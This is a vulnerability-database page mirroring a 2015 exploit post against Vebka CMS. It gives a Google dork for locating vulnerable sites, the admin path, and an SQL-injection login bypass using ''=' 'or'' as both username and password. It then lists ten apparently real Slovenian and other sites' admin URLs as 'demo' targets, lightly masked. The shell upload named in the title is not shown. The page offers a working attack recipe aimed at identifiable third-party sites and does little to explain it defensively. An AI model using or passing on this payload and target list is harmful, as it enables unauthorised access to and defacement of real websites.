Vebka Cms shell upload

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1040665 漏洞类型
发布时间 2015-12-18 更新时间 2015-12-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015120218
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
|-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-|

+ Exploit Title : Vebka Cms shell upload

+ Exploit Author : Ashiyane Digital Security Team

+ Vendor Homepage : http://www.vebka.si/

+ Google Dork : "Urejanje strani" "Uporabniško ime" "/admin"

+ Date: 18.12.2015

+ Tested On : Win 8.1 

|-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-|

|-| Admin Page => /admin/

|-| username: '=' 'or'

|-| password: '=' 'or'

|-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-|

|-| Demo(s) Site :

http://www.at-kastXelec.si/admin/
http://www.plesniXklub-art.com/admin/
http://unesco-soXle.si/admin/
http://www.cmXe-orodjarstvo.si/admin/
http://www.robor.siX/admin/
http://selitveni-serXvis.net/admin/
http://www.os-mXojstrana.si/admin/
http://biomasa-Xmarkun.si/admin/
http://promociXjskavoda.si/admin/
http://www.aXrchdesign.si/admin
|-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-|

|-| Discovered by : amin0461
|-| special tanx: malw4r3 - 4TT4CK3R
|-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-||-|